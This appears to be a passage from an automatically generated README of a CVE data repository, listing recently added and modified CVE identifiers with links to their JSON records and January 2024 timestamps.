* [CVE-2024-0937](CVE-2024/CVE-2024-09xx/CVE-2024-0937.json) (`2024-01-26T18:15:10.487`)
* [CVE-2024-0938](CVE-2024/CVE-2024-09xx/CVE-2024-0938.json) (`2024-01-26T18:15:10.720`)
* [CVE-2024-20253](CVE-2024/CVE-2024-202xx/CVE-2024-20253.json) (`2024-01-26T18:15:10.970`)
* [CVE-2024-20263](CVE-2024/CVE-2024-202xx/CVE-2024-20263.json) (`2024-01-26T18:15:11.163`)
* [CVE-2024-20305](CVE-2024/CVE-2024-203xx/CVE-2024-20305.json) (`2024-01-26T18:15:11.350`)
* [CVE-2024-21336](CVE-2024/CVE-2024-213xx/CVE-2024-21336.json) (`2024-01-26T18:15:12.040`)
* [CVE-2023-29081](CVE-2023/CVE-2023-290xx/CVE-2023-29081.json) (`2024-01-26T20:15:54.187`)
* [CVE-2024-0939](CVE-2024/CVE-2024-09xx/CVE-2024-0939.json) (`2024-01-26T19:15:08.103`)
* [CVE-2024-0941](CVE-2024/CVE-2024-09xx/CVE-2024-0941.json) (`2024-01-26T19:15:08.350`)
* [CVE-2024-0942](CVE-2024/CVE-2024-09xx/CVE-2024-0942.json) (`2024-01-26T20:15:54.403`)
* [CVE-2024-0943](CVE-2024/CVE-2024-09xx/CVE-2024-0943.json) (`2024-01-26T20:15:54.640`)
* [CVE-2024-0944](CVE-2024/CVE-2024-09xx/CVE-2024-0944.json) (`2024-01-26T20:15:54.863`)
### CVEs modified in the last Commit
Recently modified CVEs: `138`
Recently modified CVEs: `41`
* [CVE-2024-23204](CVE-2024/CVE-2024-232xx/CVE-2024-23204.json) (`2024-01-26T18:15:12.270`)
* [CVE-2024-23206](CVE-2024/CVE-2024-232xx/CVE-2024-23206.json) (`2024-01-26T18:15:12.337`)
* [CVE-2024-23207](CVE-2024/CVE-2024-232xx/CVE-2024-23207.json) (`2024-01-26T18:15:12.400`)
* [CVE-2024-23208](CVE-2024/CVE-2024-232xx/CVE-2024-23208.json) (`2024-01-26T18:15:12.463`)
* [CVE-2024-23210](CVE-2024/CVE-2024-232xx/CVE-2024-23210.json) (`2024-01-26T18:15:12.530`)
* [CVE-2024-23211](CVE-2024/CVE-2024-232xx/CVE-2024-23211.json) (`2024-01-26T18:15:12.603`)
* [CVE-2024-23212](CVE-2024/CVE-2024-232xx/CVE-2024-23212.json) (`2024-01-26T18:15:12.670`)
* [CVE-2024-23213](CVE-2024/CVE-2024-232xx/CVE-2024-23213.json) (`2024-01-26T18:15:12.737`)
* [CVE-2024-23215](CVE-2024/CVE-2024-232xx/CVE-2024-23215.json) (`2024-01-26T18:15:12.810`)
* [CVE-2024-23217](CVE-2024/CVE-2024-232xx/CVE-2024-23217.json) (`2024-01-26T18:15:12.873`)
* [CVE-2024-23218](CVE-2024/CVE-2024-232xx/CVE-2024-23218.json) (`2024-01-26T18:15:12.933`)
* [CVE-2024-23222](CVE-2024/CVE-2024-232xx/CVE-2024-23222.json) (`2024-01-26T18:15:12.997`)
* [CVE-2024-23223](CVE-2024/CVE-2024-232xx/CVE-2024-23223.json) (`2024-01-26T18:15:13.060`)
* [CVE-2024-23685](CVE-2024/CVE-2024-236xx/CVE-2024-23685.json) (`2024-01-26T18:15:45.023`)
* [CVE-2024-23686](CVE-2024/CVE-2024-236xx/CVE-2024-23686.json) (`2024-01-26T18:21:02.877`)
* [CVE-2024-0679](CVE-2024/CVE-2024-06xx/CVE-2024-0679.json) (`2024-01-26T18:30:55.493`)
* [CVE-2024-0623](CVE-2024/CVE-2024-06xx/CVE-2024-0623.json) (`2024-01-26T18:33:07.443`)
* [CVE-2024-20251](CVE-2024/CVE-2024-202xx/CVE-2024-20251.json) (`2024-01-26T18:48:16.180`)
* [CVE-2024-20270](CVE-2024/CVE-2024-202xx/CVE-2024-20270.json) (`2024-01-26T18:48:31.593`)
* [CVE-2024-20287](CVE-2024/CVE-2024-202xx/CVE-2024-20287.json) (`2024-01-26T18:49:00.013`)
* [CVE-2024-22410](CVE-2024/CVE-2024-224xx/CVE-2024-22410.json) (`2024-01-26T18:49:50.430`)
* [CVE-2024-22414](CVE-2024/CVE-2024-224xx/CVE-2024-22414.json) (`2024-01-26T18:50:02.263`)
* [CVE-2024-0580](CVE-2024/CVE-2024-05xx/CVE-2024-0580.json) (`2024-01-26T18:51:15.993`)
* [CVE-2024-0669](CVE-2024/CVE-2024-06xx/CVE-2024-0669.json) (`2024-01-26T18:52:05.550`)
* [CVE-2024-0607](CVE-2024/CVE-2024-06xx/CVE-2024-0607.json) (`2024-01-26T19:00:06.617`)
* [CVE-2023-6290](CVE-2023/CVE-2023-62xx/CVE-2023-6290.json) (`2024-01-26T19:36:13.877`)
* [CVE-2023-6384](CVE-2023/CVE-2023-63xx/CVE-2023-6384.json) (`2024-01-26T19:41:47.807`)
* [CVE-2023-6447](CVE-2023/CVE-2023-64xx/CVE-2023-6447.json) (`2024-01-26T19:43:45.243`)
* [CVE-2023-6625](CVE-2023/CVE-2023-66xx/CVE-2023-6625.json) (`2024-01-26T19:47:43.497`)
* [CVE-2023-7082](CVE-2023/CVE-2023-70xx/CVE-2023-7082.json) (`2024-01-26T19:48:56.570`)
* [CVE-2023-6626](CVE-2023/CVE-2023-66xx/CVE-2023-6626.json) (`2024-01-26T19:58:01.737`)
* [CVE-2023-44001](CVE-2023/CVE-2023-440xx/CVE-2023-44001.json) (`2024-01-26T20:00:50.610`)
* [CVE-2023-40528](CVE-2023/CVE-2023-405xx/CVE-2023-40528.json) (`2024-01-26T20:06:08.767`)
* [CVE-2023-43999](CVE-2023/CVE-2023-439xx/CVE-2023-43999.json) (`2024-01-26T20:34:08.233`)
* [CVE-2023-43998](CVE-2023/CVE-2023-439xx/CVE-2023-43998.json) (`2024-01-26T20:34:28.980`)
* [CVE-2023-42881](CVE-2023/CVE-2023-428xx/CVE-2023-42881.json) (`2024-01-26T20:50:42.450`)
* [CVE-2023-42887](CVE-2023/CVE-2023-428xx/CVE-2023-42887.json) (`2024-01-26T20:51:20.893`)
* [CVE-2023-42888](CVE-2023/CVE-2023-428xx/CVE-2023-42888.json) (`2024-01-26T20:53:27.637`)
* [CVE-2024-23680](CVE-2024/CVE-2024-236xx/CVE-2024-23680.json) (`2024-01-26T19:08:47.817`)
* [CVE-2024-23679](CVE-2024/CVE-2024-236xx/CVE-2024-23679.json) (`2024-01-26T19:12:45.117`)
* [CVE-2024-23768](CVE-2024/CVE-2024-237xx/CVE-2024-23768.json) (`2024-01-26T19:15:05.400`)
* [CVE-2024-23770](CVE-2024/CVE-2024-237xx/CVE-2024-23770.json) (`2024-01-26T19:18:29.190`)
* [CVE-2024-23771](CVE-2024/CVE-2024-237xx/CVE-2024-23771.json) (`2024-01-26T19:24:40.873`)
* [CVE-2024-22895](CVE-2024/CVE-2024-228xx/CVE-2024-22895.json) (`2024-01-26T19:34:53.417`)
* [CVE-2024-0714](CVE-2024/CVE-2024-07xx/CVE-2024-0714.json) (`2024-01-26T20:01:19.683`)
* [CVE-2024-22420](CVE-2024/CVE-2024-224xx/CVE-2024-22420.json) (`2024-01-26T20:12:04.627`)
* [CVE-2024-22421](CVE-2024/CVE-2024-224xx/CVE-2024-22421.json) (`2024-01-26T20:15:23.507`)
* [CVE-2024-23329](CVE-2024/CVE-2024-233xx/CVE-2024-23329.json) (`2024-01-26T20:19:59.393`)
* [CVE-2024-22211](CVE-2024/CVE-2024-222xx/CVE-2024-22211.json) (`2024-01-26T20:24:56.133`)
* [CVE-2024-22400](CVE-2024/CVE-2024-224xx/CVE-2024-22400.json) (`2024-01-26T20:55:37.543`)
## Download and Usage